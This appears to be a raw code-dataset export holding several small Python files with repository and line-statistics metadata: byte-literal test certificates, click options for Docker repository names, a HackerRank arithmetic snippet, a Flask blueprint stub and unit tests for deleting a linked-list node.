b"\x9d\x05\xf7\x70\xd5\xb4\xf3\x92\x68\xc1\xf3\x31\x45\xbf\x7b\x18\x83\x82\xdb\x7c\xac\xd2\x62\x1d\x89\x35\xbd\x64\xfd\xb5\x81\x25" + \
b"\x35\x16\x07\x9c\x48\x3b\xa1\x3c\xff\xa9\x6b\x95\x94\xa8\x12\x3a\x92\xdf\x24\xc1\xef\xc5\x0b\xee\x7e\xc1\x98\x02\xf9\xbb\xd5\x42" + \
b"\xe8\x9b\xf0\xe2\xcf\x4d\x1e\xa2\x6b\x62\x08\x1e\x62\xcc\x46\xee\x77\xf1\x35\xce\x81\x0f\x07\x62\x69\x04\x41\xef\x92\x17\xc3\x01" + \
b"\x64\xba\xd8\x07\xfa\xe8\x8a\x08\x21\x05\xf8\xa0\x6e\x87\xd3\xc0\xdf\x05\xfa\x4d\x9c\x3f\xce\xc3\x7a\xd8\xb2\xcd\x29\x31\x02\x81" + \
b"\x80\x59\x7c\x94\xf2\x28\x9c\x8c\x24\x1c\xc3\x84\xac\xf6\x49\xf6\xc7\xb1\x98\x66\xf5\x6c\x59\x31\xe5\x30\xb2\xc1\xc0\xcc\x15\x94" + \
b"\x4d\x5a\xa0\x5c\xcb\x30\x46\xaa\xdc\x25\x60\xe2\x64\x5f\x1e\x35\xc3\x82\x3c\x47\x06\xc7\x4f\x39\xcc\x4f\xda\xf7\xf5\x28\x30\xde" + \
b"\x9a\xa3\xb9\xf6\xa4\x4a\x43\xff\x9e\x1a\x01\xcb\x03\x51\x37\xd4\xb8\xea\xab\xd5\xb6\x36\xf9\x76\x1e\x08\x9e\xcd\x58\x71\x8b\x6d" + \
b"\xa6\xf4\x43\xa3\x63\xf8\xd5\x72\xc1\x4b\x76\x78\x03\x15\x8d\xbf\xb3\x1f\x63\x3f\x99\xec\xfb\xd1\x5d\x09\x1d\xa6\xe6\xd0\xc6\x3c" + \
b"\xf9"
certs = [b"\x30\x82\x02\xb5\x30\x82\x01\x9d\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x30" + \
b"\x1e\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07\x52\x53\x41\x32\x30\x34\x38\x31\x0a\x30\x08\x06\x03\x55\x04\x0a\x0c\x01\x31\x30" + \
b"\x1e\x17\x0d\x31\x36\x30\x35\x31\x35\x31\x38\x35\x38\x30\x34\x5a\x17\x0d\x31\x38\x30\x35\x31\x35\x31\x38\x35\x38\x30\x34\x5a\x30" + \
b"\x1e\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07\x52\x53\x41\x32\x30\x34\x38\x31\x0a\x30\x08\x06\x03\x55\x04\x0a\x0c\x01\x31\x30" + \
b"\x82\x01\x22\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x00\x30\x82\x01\x0a\x02\x82\x01\x01\x00" + \
b"\xc0\x86\x99\x9a\x76\x74\x9a\xf5\x04\xb8\x48\xf0\x7e\x67\xc3\x90\x51\x17\xe6\xcd\xb3\x97\x6b\x41\xbc\x4e\x4e\x0c\x30\xff\x57\xf1" + \
b"\x47\x99\xd5\xc3\x2a\x67\x26\x6c\x28\x1e\x18\x03\x0f\xaf\xd2\x70\xd2\xb2\xab\xae\x44\x7a\x1c\xcd\xce\x6f\xcb\xfb\x56\x96\x1b\x12" + \
b"\x52\x11\x43\x01\x26\x07\x4c\xf9\x3e\x51\x6b\xd3\x9a\x7d\xd8\x26\x92\xa1\xab\x5a\x6e\x2f\x66\x61\x31\x62\x23\x0f\x8b\x0a\x6a\x17" + \
b"\xe7\xd0\x0a\xc1\x69\x8a\x60\xcf\xba\x6c\x30\x33\x88\x2c\xaf\x13\x9a\xa6\x49\x83\x74\xb4\xdf\x23\xad\xe4\x01\x21\x52\x51\xfe\xcc" + \
b"\x4f\x4e\x3e\xd1\xa8\xce\x92\xc0\x34\x0e\x1d\x6c\xa7\x4d\x6f\x7d\xd7\x65\xb8\xf4\x50\xa1\x58\xa6\x8a\xae\x9e\x21\x50\x84\x01\x38" + \
b"\x1d\x85\x6e\xcb\x7d\xc9\xb5\x6b\xda\x94\xe5\x1c\xa8\xf5\x15\x5e\x8f\xbc\x95\xe0\x76\xcb\x0d\x7e\x79\x11\x0c\x81\xd2\x60\xf1\xaf" + \
b"\x84\xcc\xa0\x3b\x06\xe8\xa2\x42\x9f\xb3\xd4\x94\x8e\xd0\xbc\xe8\x7e\xfa\x01\x6b\x0d\xd0\x16\x60\x47\x86\x9c\xb9\x7f\x12\xd9\x21" + \
b"\x5c\xf7\x8e\x35\x7e\x85\x18\xfa\xc8\x86\xed\xbe\xb3\x0e\x4a\x56\xd7\xd6\x92\x3d\x23\x3c\xbc\xcc\xef\x3a\x33\xd8\x48\xd8\xca\x55" + \
b"\x02\x03\x01\x00\x01\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x03\x82\x01\x01\x00\x19\x9d\xca\x8f\x2b\x4a\xfd" + \
b"\xb6\x30\x4c\x1a\x45\xe1\x8a\x30\x72\x5e\xf3\xb4\x3c\x81\xf7\x00\xd2\x72\x44\x65\x49\x78\x3a\x62\xc9\x5d\xad\xb7\x39\x6c\x40\x50" + \
b"\x85\xd3\xc9\x0e\x69\x7a\xcc\x3e\x12\x68\x7e\x84\xe2\xcd\x33\xb7\x08\xf0\x6e\xda\x7f\xfb\x40\x96\xd1\x5f\x1f\x6e\x42\xa5\x42\xd2" + \
b"\xf5\x45\x27\x6f\xcc\x3a\x49\xc6\x61\xf0\xd7\x22\x0e\x2e\xc3\xb7\x77\xbf\xc7\x35\x63\x47\x6e\x80\x4a\x5a\x0b\xd1\x7e\xb5\xd3\x2a" + \
b"\x1d\xdf\x34\x72\xbd\x36\x01\x0b\x07\xe5\xcf\xef\x4c\x3d\xba\xe8\x5d\x74\x62\xe7\xd4\xb7\x76\xfd\xc8\x1e\x04\x0c\x0d\x0c\xdf\x0e" + \
b"\xbe\x72\x8f\x1c\xa0\xfa\x88\x23\x2c\xed\x86\x3b\xd0\xb3\x67\x62\x84\x2a\x23\xe5\x05\xbf\xd1\x95\xd7\xac\x82\xd9\x02\x51\x61\xa3" + \
b"\x10\xc7\xb1\x52\xbc\xe7\xa9\xc2\xf7\x8c\x82\x26\xcd\xf2\x76\x48\x2e\xa0\xfa\xd3\x8d\xe5\x19\xd9\x55\x73\x4e\x1a\x96\xb4\x86\x75" + \
b"\x8e\xda\xaa\x69\xd0\x15\x7c\x42\x9c\x8e\xeb\x9c\x94\xa0\xf6\x74\xbd\x3a\x9b\xda\x9a\x34\xef\xfe\xd6\x2b\x74\x43\x61\xc2\xd0\xf5" + \
b"\xb5\x2f\x51\x9d\xcb\xb9\x04\x6b\x21\x81\x01\x24\xfb\xf1\xbe\x1a\x14\xf0\x68\xdf\x4a\x31\x2f\x91\x2e",
b"\x30\x82\x02\xb5\x30\x82\x01\x9d\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x30" + \
b"\x1e\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07\x52\x53\x41\x32\x30\x34\x38\x31\x0a\x30\x08\x06\x03\x55\x04\x0a\x0c\x01\x32\x30" + \
b"\x1e\x17\x0d\x31\x36\x30\x35\x31\x35\x31\x38\x35\x38\x30\x34\x5a\x17\x0d\x31\x38\x30\x35\x31\x35\x31\x38\x35\x38\x30\x34\x5a\x30" + \
b"\x1e\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07\x52\x53\x41\x32\x30\x34\x38\x31\x0a\x30\x08\x06\x03\x55\x04\x0a\x0c\x01\x32\x30" + \
b"\x82\x01\x22\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x00\x30\x82\x01\x0a\x02\x82\x01\x01\x00" + \
b"\xc0\x86\x99\x9a\x76\x74\x9a\xf5\x04\xb8\x48\xf0\x7e\x67\xc3\x90\x51\x17\xe6\xcd\xb3\x97\x6b\x41\xbc\x4e\x4e\x0c\x30\xff\x57\xf1" + \
b"\x47\x99\xd5\xc3\x2a\x67\x26\x6c\x28\x1e\x18\x03\x0f\xaf\xd2\x70\xd2\xb2\xab\xae\x44\x7a\x1c\xcd\xce\x6f\xcb\xfb\x56\x96\x1b\x12" + \
b"\x52\x11\x43\x01\x26\x07\x4c\xf9\x3e\x51\x6b\xd3\x9a\x7d\xd8\x26\x92\xa1\xab\x5a\x6e\x2f\x66\x61\x31\x62\x23\x0f\x8b\x0a\x6a\x17" + \
b"\xe7\xd0\x0a\xc1\x69\x8a\x60\xcf\xba\x6c\x30\x33\x88\x2c\xaf\x13\x9a\xa6\x49\x83\x74\xb4\xdf\x23\xad\xe4\x01\x21\x52\x51\xfe\xcc" + \
b"\x4f\x4e\x3e\xd1\xa8\xce\x92\xc0\x34\x0e\x1d\x6c\xa7\x4d\x6f\x7d\xd7\x65\xb8\xf4\x50\xa1\x58\xa6\x8a\xae\x9e\x21\x50\x84\x01\x38" + \
b"\x1d\x85\x6e\xcb\x7d\xc9\xb5\x6b\xda\x94\xe5\x1c\xa8\xf5\x15\x5e\x8f\xbc\x95\xe0\x76\xcb\x0d\x7e\x79\x11\x0c\x81\xd2\x60\xf1\xaf" + \
b"\x84\xcc\xa0\x3b\x06\xe8\xa2\x42\x9f\xb3\xd4\x94\x8e\xd0\xbc\xe8\x7e\xfa\x01\x6b\x0d\xd0\x16\x60\x47\x86\x9c\xb9\x7f\x12\xd9\x21" + \
b"\x5c\xf7\x8e\x35\x7e\x85\x18\xfa\xc8\x86\xed\xbe\xb3\x0e\x4a\x56\xd7\xd6\x92\x3d\x23\x3c\xbc\xcc\xef\x3a\x33\xd8\x48\xd8\xca\x55" + \
b"\x02\x03\x01\x00\x01\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x03\x82\x01\x01\x00\x6b\xe1\x9a\x78\x2f\x13\x79" + \
b"\xa7\xbb\xf4\xb3\x2b\x6a\x99\x1b\xfb\x99\xeb\xce\xd4\x36\x7f\x1e\xe5\x3f\xcd\x4d\xaf\xe7\x2d\xa3\x81\x5b\x5c\xf5\x86\x71\x3d\x80" + \
b"\x81\x26\xdb\x78\x18\x5b\xd8\x97\x4c\x9d\xa4\xa2\xf7\xb8\xce\xb9\x00\x29\xba\x30\xa0\x5c\xff\xed\x68\xcb\xd1\x10\x22\xc0\x1a\xd4" + \
b"\x80\x9c\x3c\xb2\xd5\x41\xad\x75\x6a\x21\x6e\x77\xd7\x49\x65\xa2\x0b\x47\xfe\x92\xf5\x26\x2a\xea\x59\xe3\xa6\xcc\x1d\xdd\x9c\x09" + \
b"\x23\xfa\xa9\x99\x59\xf4\xda\x49\x1f\xd3\x11\xea\xff\x36\xef\xe5\xcb\x5a\xb4\xa7\x2b\x57\x07\x00\xeb\x1b\x64\x9c\x2f\xa5\x47\x0f" + \
b"\x33\x6d\x7f\x42\x87\xe1\x25\x19\x31\xd7\x08\x55\x82\xe9\xfa\x8c\x6d\xda\x4e\x72\x78\xbe\xe1\x68\x32\x08\xf1\x7f\xb4\x4d\xa0\xd8" + \
b"\xd6\x4f\xad\x61\x01\x83\xf4\xb3\xef\xae\xc2\x86\xee\xd6\xca\x5f\x5b\x8b\x6b\x5a\x13\x98\x6c\x23\xff\x17\x53\x5f\x43\x31\x9e\xf7" + \
b"\x6d\xfd\x0a\x5b\xce\x25\x85\xe4\xc2\x49\x99\x09\x38\x98\xe0\x68\x88\xb8\x2d\xb8\x78\xc7\xbd\x3b\x33\x1e\xdf\x3f\xd8\xae\xfa\x8b" + \
b"\x1d\x4d\xb8\x95\x2f\x2f\x9f\x47\x1c\xbd\xa5\x2c\x74\x40\xc3\x62\x76\x1e\x99\xe5\xd9\x84\x62\x1c\x9c",
b"\x30\x82\x02\xb5\x30\x82\x01\x9d\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x30" + \
b"\x1e\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07\x52\x53\x41\x32\x30\x34\x38\x31\x0a\x30\x08\x06\x03\x55\x04\x0a\x0c\x01\x33\x30" + \
b"\x1e\x17\x0d\x31\x36\x30\x35\x31\x35\x31\x38\x35\x38\x30\x34\x5a\x17\x0d\x31\x38\x30\x35\x31\x35\x31\x38\x35\x38\x30\x34\x5a\x30" + \
b"\x1e\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07\x52\x53\x41\x32\x30\x34\x38\x31\x0a\x30\x08\x06\x03\x55\x04\x0a\x0c\x01\x33\x30" + \
b"\x82\x01\x22\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x00\x30\x82\x01\x0a\x02\x82\x01\x01\x00" + \
b"\xc0\x86\x99\x9a\x76\x74\x9a\xf5\x04\xb8\x48\xf0\x7e\x67\xc3\x90\x51\x17\xe6\xcd\xb3\x97\x6b\x41\xbc\x4e\x4e\x0c\x30\xff\x57\xf1" + \
b"\x47\x99\xd5\xc3\x2a\x67\x26\x6c\x28\x1e\x18\x03\x0f\xaf\xd2\x70\xd2\xb2\xab\xae\x44\x7a\x1c\xcd\xce\x6f\xcb\xfb\x56\x96\x1b\x12" + \
b"\x52\x11\x43\x01\x26\x07\x4c\xf9\x3e\x51\x6b\xd3\x9a\x7d\xd8\x26\x92\xa1\xab\x5a\x6e\x2f\x66\x61\x31\x62\x23\x0f\x8b\x0a\x6a\x17" + \
b"\xe7\xd0\x0a\xc1\x69\x8a\x60\xcf\xba\x6c\x30\x33\x88\x2c\xaf\x13\x9a\xa6\x49\x83\x74\xb4\xdf\x23\xad\xe4\x01\x21\x52\x51\xfe\xcc" + \
b"\x4f\x4e\x3e\xd1\xa8\xce\x92\xc0\x34\x0e\x1d\x6c\xa7\x4d\x6f\x7d\xd7\x65\xb8\xf4\x50\xa1\x58\xa6\x8a\xae\x9e\x21\x50\x84\x01\x38" + \
b"\x1d\x85\x6e\xcb\x7d\xc9\xb5\x6b\xda\x94\xe5\x1c\xa8\xf5\x15\x5e\x8f\xbc\x95\xe0\x76\xcb\x0d\x7e\x79\x11\x0c\x81\xd2\x60\xf1\xaf" + \
b"\x84\xcc\xa0\x3b\x06\xe8\xa2\x42\x9f\xb3\xd4\x94\x8e\xd0\xbc\xe8\x7e\xfa\x01\x6b\x0d\xd0\x16\x60\x47\x86\x9c\xb9\x7f\x12\xd9\x21" + \
b"\x5c\xf7\x8e\x35\x7e\x85\x18\xfa\xc8\x86\xed\xbe\xb3\x0e\x4a\x56\xd7\xd6\x92\x3d\x23\x3c\xbc\xcc\xef\x3a\x33\xd8\x48\xd8\xca\x55" + \
b"\x02\x03\x01\x00\x01\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x03\x82\x01\x01\x00\x64\xd9\x2e\x77\xcb\xb8\x6c" + \
b"\xad\xf0\x99\x8b\x02\xfd\x11\xf4\x1b\x82\xfe\x44\xcf\x06\x76\xe0\xb5\xd7\xd1\xa9\xc0\xeb\xd6\x9f\x8e\xfc\x51\x1c\x51\xb4\x83\xc7" + \
b"\xf0\x3b\x7c\xc9\xde\x0b\x4a\x06\xf3\xdd\xe1\xcb\xd3\x65\xf3\x2a\xdb\x25\x9c\x09\xdd\xce\xd8\x2c\x76\x92\x0a\x3b\x39\x37\x23\x23" + \
b"\xe1\x44\x7c\x10\x2c\xe5\x67\x69\xf2\x85\x7f\x1d\xa4\xd3\xac\x5b\x14\x43\x2d\xff\xe2\x48\xe0\xce\x4c\x00\x02\xb7\xcf\xa1\xe5\xe6" + \
b"\x53\x06\x15\x50\x4a\xd9\x77\xe3\x4e\x8d\x78\x88\xea\x60\x9b\x15\xa8\x2d\x95\xdf\x01\x71\x38\xf8\xeb\x48\x65\xe0\x5f\x46\x55\x24" + \
b"\xd4\xea\xa0\xfb\xbd\x59\x68\x1d\x14\x38\xc6\x46\x69\x2d\x2a\xd5\xfa\xed\xf9\x0e\xe7\xaf\x6d\xf1\x25\x8b\x3c\x97\x0e\xeb\x6e\x28" + \
b"\x46\x11\x54\x7e\x49\xfa\x14\x26\xeb\x2a\x86\x62\x79\x4d\x13\x1b\x20\x4f\x67\x43\xfb\x03\xcd\x30\x70\x02\xfb\x5c\x67\xe9\x93\x4c" + \
b"\xd3\x07\xf5\x5c\x03\x46\xc6\x7b\xe6\x47\x1b\xc1\x55\xcb\xda\x13\x41\x9f\xd3\x85\x7c\x99\xf5\xea\x30\x0e\xf5\x36\x7a\xa5\x97\x00" + \
b"\x7d\x8f\xc4\xb3\xae\xad\x99\xbd\x13\x52\xde\x5b\x07\xa4\x54\xe9\x48\x3b\x2c\xe6\x4b\xae\x79\xfb\x72"]
| 144.993506
| 153
| 0.652649
| 4,954
| 22,329
| 2.940856
| 0.052887
| 0.010708
| 0.007413
| 0.009884
| 0.83156
| 0.83156
| 0.754067
| 0.754067
| 0.754067
| 0.754067
| 0
| 0.319315
| 0.105468
| 22,329
| 153
| 154
| 145.941176
| 0.410083
| 0
| 0
| 0.248366
| 0
| 0.980392
| 0.858614
| 0.858435
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
2475732e2a87ac11704ba2758df551c5ba82b68a
| 64
|
py
|
Python
|
Python/1. Introduction/03 - Arithmetic Operators.py
|
rosiejh/HackerRank
|
bfb07b8add04d3f3b67a61754db483f88a79e5a5
|
[
"Apache-2.0"
] | null | null | null |
Python/1. Introduction/03 - Arithmetic Operators.py
|
rosiejh/HackerRank
|
bfb07b8add04d3f3b67a61754db483f88a79e5a5
|
[
"Apache-2.0"
] | null | null | null |
Python/1. Introduction/03 - Arithmetic Operators.py
|
rosiejh/HackerRank
|
bfb07b8add04d3f3b67a61754db483f88a79e5a5
|
[
"Apache-2.0"
] | null | null | null |
a, b = int(input()), int(input())
print(a+b, a-b, a*b, sep='\n')
| 32
| 33
| 0.515625
| 15
| 64
| 2.2
| 0.466667
| 0.242424
| 0.181818
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 64
| 2
| 34
| 32
| 0.589286
| 0
| 0
| 0
| 0
| 0
| 0.030769
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
24bcbe1dcf936db362fb7408a9568d35cc6c7f87
| 3,049
|
py
|
Python
|
src/cli/options/docker_repository_options.py
|
SimonDudanski/integration-test-docker-environment
|
3ea81172248f770596d81ff378772677ab5656ea
|
[
"MIT"
] | 4
|
2020-06-25T20:47:31.000Z
|
2021-09-10T15:22:51.000Z
|
src/cli/options/docker_repository_options.py
|
SimonDudanski/integration-test-docker-environment
|
3ea81172248f770596d81ff378772677ab5656ea
|
[
"MIT"
] | 113
|
2020-06-02T08:51:08.000Z
|
2022-03-31T08:47:41.000Z
|
src/cli/options/docker_repository_options.py
|
SimonDudanski/integration-test-docker-environment
|
3ea81172248f770596d81ff378772677ab5656ea
|
[
"MIT"
] | 2
|
2020-05-19T10:57:47.000Z
|
2020-06-22T13:32:20.000Z
|
import click
docker_repository_options = [
click.option('--source-docker-repository-name', type=str,
default="exasol/script-language-container",
show_default=True,
help="Name of the docker repository for pulling cached stages. "
"The repository name may contain the URL of the docker registry, "
"the username and the actual repository name. "
"A common structure is <docker-registry-url>/<username>/<repository-name>"),
click.option('--source-docker-tag-prefix', type=str,
default="",
show_default=True,
help="Prefix for the tags which are used for pulling of cached stages"),
click.option('--source-docker-username', type=str,
help="Username for the docker registry from where the system pulls cached stages.",
required=False),
click.option('--source-docker-password', type=str,
help="Password for the docker registry from where the system pulls cached stages. "
"Without password option the system prompts for the password."),
click.option('--target-docker-repository-name', type=str,
default="exasol/script-language-container",
show_default=True,
help="Name of the docker repository for naming and pushing images of stages. "
"The repository name may contain the URL of the docker registry, "
"the username and the actual repository name. "
"A common structure is <docker-registry-url>/<username>/<repository-name>"),
click.option('--target-docker-tag-prefix', type=str,
default="",
show_default=True,
help="Prefix for the tags which are used for naming and pushing of stages"),
click.option('--target-docker-username', type=str,
help="Username for the docker registry where the system pushes images of stages.",
required=False),
click.option('--target-docker-password', type=str,
help="Password for the docker registry where the system pushes images of stages. "
"Without password option the system prompts for the password."),
]
simple_docker_repository_options = [
click.option('--docker-repository-name', type=str,
default="exasol/script-language-container",
show_default=True,
help="Name of the docker repository for naming images. "
"The repository name may contain the URL of the docker registry, "
"the username and the actual repository name. "
"A common structure is <docker-registry-url>/<username>/<repository-name>"),
click.option('--docker-tag-prefix', type=str,
default="",
show_default=True,
help="Prefix for the tags of the images"),
]
| 57.528302
| 100
| 0.595933
| 344
| 3,049
| 5.25
| 0.162791
| 0.093023
| 0.065891
| 0.063123
| 0.894241
| 0.830011
| 0.830011
| 0.830011
| 0.830011
| 0.830011
| 0
| 0
| 0.309282
| 3,049
| 52
| 101
| 58.634615
| 0.85755
| 0
| 0
| 0.5
| 0
| 0
| 0.541817
| 0.157429
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.12
| 0.02
| 0
| 0.02
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
7009e1e9467c6a8e146408a6c67960d19e4dfc62
| 46
|
py
|
Python
|
tutorial4.py
|
camelCasedAdi/Python-Programming-Tutorials
|
65aa7092a90b3c0cad7b35584714570231305d37
|
[
"MIT"
] | null | null | null |
tutorial4.py
|
camelCasedAdi/Python-Programming-Tutorials
|
65aa7092a90b3c0cad7b35584714570231305d37
|
[
"MIT"
] | null | null | null |
tutorial4.py
|
camelCasedAdi/Python-Programming-Tutorials
|
65aa7092a90b3c0cad7b35584714570231305d37
|
[
"MIT"
] | null | null | null |
print(15 != 15)
print(10 > 11)
print(10 > 9)
| 9.2
| 15
| 0.565217
| 9
| 46
| 2.888889
| 0.555556
| 0.538462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.305556
| 0.217391
| 46
| 5
| 16
| 9.2
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
7072c54759066c86ec241bb3f367a970099e43c9
| 111
|
py
|
Python
|
backend/ui-fulfillment/fulfillment_service/utils/tests.py
|
m0ps/gcp-fsi-design-pattern-ipre
|
391fc03c70bd7e2fb38605980d25e32ede6c7d27
|
[
"Apache-2.0"
] | 7
|
2021-06-23T08:09:42.000Z
|
2022-01-16T05:17:07.000Z
|
backend/ui-fulfillment/fulfillment_service/utils/tests.py
|
skylinepro/gcp-fsi-design-pattern-ipre
|
7a933e742b29a4b1b9acde2c2a03ff29bf61e600
|
[
"Apache-2.0"
] | null | null | null |
backend/ui-fulfillment/fulfillment_service/utils/tests.py
|
skylinepro/gcp-fsi-design-pattern-ipre
|
7a933e742b29a4b1b9acde2c2a03ff29bf61e600
|
[
"Apache-2.0"
] | 3
|
2021-06-29T12:53:09.000Z
|
2021-12-14T01:34:50.000Z
|
def lists_equal(left, right, sort_by=None):
return sorted(left, key=sort_by) == sorted(right, key=sort_by)
| 37
| 66
| 0.72973
| 19
| 111
| 4.052632
| 0.578947
| 0.233766
| 0.233766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126126
| 111
| 2
| 67
| 55.5
| 0.793814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
56457c59734ae192bc859356095eadb6d1420e25
| 90
|
py
|
Python
|
rman/app/routes/api_0_0/rm_task/__init__.py
|
RockFeng0/rtsf-manager
|
e11458364ca004a7fdee8be801ada72ec3ac3ce2
|
[
"MIT"
] | null | null | null |
rman/app/routes/api_0_0/rm_task/__init__.py
|
RockFeng0/rtsf-manager
|
e11458364ca004a7fdee8be801ada72ec3ac3ce2
|
[
"MIT"
] | null | null | null |
rman/app/routes/api_0_0/rm_task/__init__.py
|
RockFeng0/rtsf-manager
|
e11458364ca004a7fdee8be801ada72ec3ac3ce2
|
[
"MIT"
] | 1
|
2019-04-14T03:02:38.000Z
|
2019-04-14T03:02:38.000Z
|
from flask import Blueprint
rm_task = Blueprint('rm_task', __name__)
from . import views
| 18
| 40
| 0.777778
| 13
| 90
| 4.923077
| 0.615385
| 0.34375
| 0.46875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144444
| 90
| 4
| 41
| 22.5
| 0.831169
| 0
| 0
| 0
| 0
| 0
| 0.077778
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
566f718ed13ef2ed3fa8587c240a2bce03b5b31f
| 2,186
|
py
|
Python
|
tests/test_q0203.py
|
mirzadm/ctci-5th-py
|
ba2f4de0aba4c7c04d7e0ddf3120ce312d9e5d66
|
[
"MIT"
] | null | null | null |
tests/test_q0203.py
|
mirzadm/ctci-5th-py
|
ba2f4de0aba4c7c04d7e0ddf3120ce312d9e5d66
|
[
"MIT"
] | 1
|
2018-07-04T23:10:20.000Z
|
2018-07-04T23:10:20.000Z
|
tests/test_q0203.py
|
mirzadm/ctci-5th-py
|
ba2f4de0aba4c7c04d7e0ddf3120ce312d9e5d66
|
[
"MIT"
] | null | null | null |
"""Unit tests for q0203.py."""
import unittest
from src.utils.linkedlist import LinkedList
from src.q0203 import del_intermediate_node
class TestDelIntermediateNode(unittest.TestCase):
"""Tests for del_intermediate_node."""
def test_del_intermediate_node(self):
self.assertFalse(del_intermediate_node(None))
linked_list = LinkedList()
n = linked_list.head
self.assertFalse(del_intermediate_node(n))
linked_list = LinkedList()
linked_list.insert_at_head(3)
self.assertEqual(linked_list.convert_to_list(), [3])
n = linked_list.head
self.assertFalse(del_intermediate_node(n))
self.assertEqual(linked_list.convert_to_list(), [3])
linked_list = LinkedList()
linked_list.insert_at_head(3)
linked_list.insert_at_head(2)
self.assertEqual(linked_list.convert_to_list(), [2, 3])
n = linked_list.head
self.assertTrue(del_intermediate_node(n))
self.assertEqual(linked_list.convert_to_list(), [3])
linked_list = LinkedList()
linked_list.insert_at_head(3)
linked_list.insert_at_head(2)
linked_list.insert_at_head(1)
self.assertEqual(linked_list.convert_to_list(), [1, 2, 3])
n = linked_list.head.next_node.next_node
self.assertFalse(del_intermediate_node(n))
self.assertTrue(linked_list.convert_to_list())
linked_list = LinkedList()
linked_list.insert_at_head(3)
linked_list.insert_at_head(2)
linked_list.insert_at_head(1)
self.assertEqual(linked_list.convert_to_list(), [1, 2, 3])
n = linked_list.head.next_node
self.assertTrue(del_intermediate_node(n))
self.assertEqual(linked_list.convert_to_list(), [1, 3])
linked_list = LinkedList()
linked_list.insert_at_head(3)
linked_list.insert_at_head(2)
linked_list.insert_at_head(1)
self.assertEqual(linked_list.convert_to_list(), [1, 2, 3])
n = linked_list.head
self.assertTrue(del_intermediate_node(n))
self.assertEqual(linked_list.convert_to_list(), [2, 3])
if __name__ == '__main__':
unittest.main()
| 35.258065
| 66
| 0.682983
| 290
| 2,186
| 4.768966
| 0.134483
| 0.245842
| 0.138829
| 0.156182
| 0.802603
| 0.761388
| 0.761388
| 0.733189
| 0.704266
| 0.644252
| 0
| 0.022016
| 0.21043
| 2,186
| 61
| 67
| 35.836066
| 0.779258
| 0.026075
| 0
| 0.75
| 0
| 0
| 0.003777
